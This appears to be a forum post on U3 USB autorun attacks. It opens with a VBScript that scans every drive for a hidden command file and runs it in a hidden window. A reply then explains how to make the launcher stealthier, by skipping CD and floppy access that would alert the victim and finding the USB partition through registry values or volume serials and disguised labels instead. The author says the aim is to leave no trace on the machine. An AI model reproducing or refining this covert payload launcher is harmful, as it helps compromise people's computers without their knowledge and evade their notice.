Set objFSO = CreateObject("Scripting.FileSystemObject")
Set colDrives = objFSO.Drives
For Each objDrive in colDrives
If objFSO.FileExists(objDrive.DriveLetter & ":wipcmdgo.cmd") Then
strPath = objDrive.DriveLetter & ":wipcmd"
strcmd = """" & strPath & "" & "go.cmd" & """"
CreateObject("Wscript.Shell").CurrentDirectory = strPath
CreateObject("Wscript.Shell").Run strcmd, 0, False
End If
Next
Hi pseudobreed, I see one issue with your code. I've been working on various USB attacks over the past few months, originally being interested in hacking iPod firmware to get it to autorun, and had decided to try with U3 devices after I read up on them. The wonderful folks on this forum beat me to it by a couple of weeks though ;( Anyhow - your code will search through each drive on the system looking for the presence of the file "wipcmdgo.cmd" in order to find the drive that the USB Partition is on. This is what I had originally planned to do as well, unfortunately it is not as stealthy as I had hoped. If the user has a CD-ROM or floppy in the machine you code will make a call to the disk to the look for the presence of the file. In both these cases a user would realise something was going on as the Floppy will start making noise / CD-Rom will start spinning.
Theres 2 ways I tried to get around this. Firstly you can check the values in the HKLMSystemMountedDevices key that are in the format "DosDevices[DRIVE LETTER]" and look for the value that corresponds to the USB Drive.
The other way (that I use) is a simple loop written in C++ that starts at D: and wokrds through to Z: (then does A: - C: ) calling GetVolumeInformation on each drive until you find the one whose serial number matches your disk. Or easier again rename your disk to something like " Local Disk" (Note the space) and search the GetVolumeInformation for that. This is great as it does not actually query the disks themselves - just the registry. Then once you have your drive just take the drive letter and ShellExecute your autorun file on the autorun partition.
I'll post up my payload and stuff later on - its similar to what people have already posted with some small differences. The idea I wanted with my payload was that I wanted there to be no traces of the machine ever being touched -so there are no backdoors dropped, firewall setting changed etc.
